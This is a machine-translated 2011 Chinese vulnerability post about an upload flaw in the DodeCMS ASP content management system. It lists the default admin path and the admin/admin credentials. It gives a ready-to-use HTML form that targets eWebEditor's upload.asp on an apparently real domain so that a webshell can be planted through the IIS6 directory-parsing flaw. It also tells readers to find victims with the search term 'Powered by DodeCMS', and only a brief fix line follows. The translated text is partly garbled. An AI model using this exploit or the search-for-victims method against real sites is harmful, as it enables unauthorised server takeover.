DodeCMS to create a website content management system upload vulnerability 0day-vulnerability warning-the black bar safety net

2011-03-19T00:00:00
ID MYHACK58:62201129779
Type myhack58
Reporter 佚名
Modified 2011-03-19T00:00:00

Description

Program description: DodeCMS to create a website content management system by the Liaoning to create a network Technology Co., Ltd. based on Microsoft ASP, GM ACCESS database development is completed; Access modes using the dynamic mode, basically realized the system custom function, The code concise and efficient, easy to modify maintenance, scalable and strong.

The default background path: admin/ The default background Username Password admin Official website:<http://www.dodecms.com/>

Premise: IIS6. 0+asp environment

Vulnerability file: admin/eWebEditor/asp/upload. the asp code slightly, causes slightly. (Want to know their Baidu)

Use code: <form action="http://www.0855.tv/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr. DzY. the asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 0 0><br><br> <input type=submit value=upload> </form> There are pictures really like(recommended to pass the pony) to:

!

!

Since the present machine to test the install, not IIS6. 0 it cannot be resolved successfully.

Test: Powered by DodeCMS

Many find their own keywords. The celestial decree is not allowed. Their own easy points.

Fix: Increased validation\change the path\or deleted directly.